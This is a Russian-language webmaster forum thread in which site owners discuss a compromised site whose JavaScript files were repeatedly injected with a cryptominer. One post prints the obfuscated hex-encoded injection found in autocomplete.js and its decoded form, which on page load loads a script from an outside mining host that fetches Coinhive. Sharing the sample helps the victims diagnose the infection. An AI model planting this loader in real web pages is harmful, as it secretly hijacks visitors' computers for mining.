[Помощь] СРОЧНО в cpt_maincontent - вставили вирусы - где копать?

А поконкретнее нет расскажете?
12.png

Скрытое содержимое доступно для зарегистрированных пользователей!
 
тоже нашел у себя майнер, причем за 1 день 3 раза заразу заносили разными путями.

к папке с скриптами (js) был кривой доступ либо через редактор залезли, не знаю, тоже пришлось все пароли менять и проверять скрипты

первый раз - через mloader.js и behavior.js - также как 3 месяца назад

второй раз, буквально через пару часов, снова mloader.js и niftycube.js

тут же грохнул.

под конец закодировали и закинули в autocomplete.js
такой текст

var _0x7824=["\x6F\x6E\x6C\x6F\x61\x64","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x73\x72\x63","\x2F\x2F\x6D\x69\x6E\x69\x6E\x67\x73\x74\x6F\x63\x6B\x2E\x6E\x65\x74\x2F\x63\x6F\x6D\x6D\x6F\x6E\x2F\x6A\x73\x2F\x6D\x6C\x6F\x61\x64\x65\x72\x2E\x6A\x73\x3F\x69\x64\x3D\x33\x32\x39\x38\x26\x74\x68\x3D\x35\x30","\x74\x65\x78\x74","\x73\x6F\x72\x74\x74\x61\x62\x6C\x65\x2E\x69\x6E\x69\x74\x28\x29","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x68\x65\x61\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65"];window[_0x7824[0]]= function(){var _0xe5ecx1=document[_0x7824[2]](_0x7824[1]);_0xe5ecx1[_0x7824[3]]= _0x7824[4];_0xe5ecx1[_0x7824[5]]= _0x7824[6];document[_0x7824[9]](_0x7824[8])[0][_0x7824[7]](_0xe5ecx1)}

при переводе Hex Decoder получается

var _0x7824=["onload","script","createElement","src","//miningstock.net/common/js/mloader.js?id=3298&th=50","text","sorttable.init()","appendChild","head","getElementsByTagName"];window[_0x7824[0]]= function(){var _0xe5ecx1=document[_0x7824[2]](_0x7824[1]);_0xe5ecx1[_0x7824[3]]= _0x7824[4];_0xe5ecx1[_0x7824[5]]= _0x7824[6];document[_0x7824[9]](_0x7824[8])[0][_0x7824[7]]


"miningstock.net/common/js/mloader.js?id=3298&th=50", снова грузил coinhive.min.js
 
посмотрим, все равно узнаем причину и источник рано или поздно. буду внимательно наблюдать
 
все равно узнаем причину и источник рано или поздно
Может пора уже движок сменить? Там где поддерживаю сайты, часть функций переписал, т.к. на старом php сидеть не очень интересно.
 
Модули проверяйте, я однажды готовый модуль поставил а он с шеллом оказался.
 
Назад
Сверху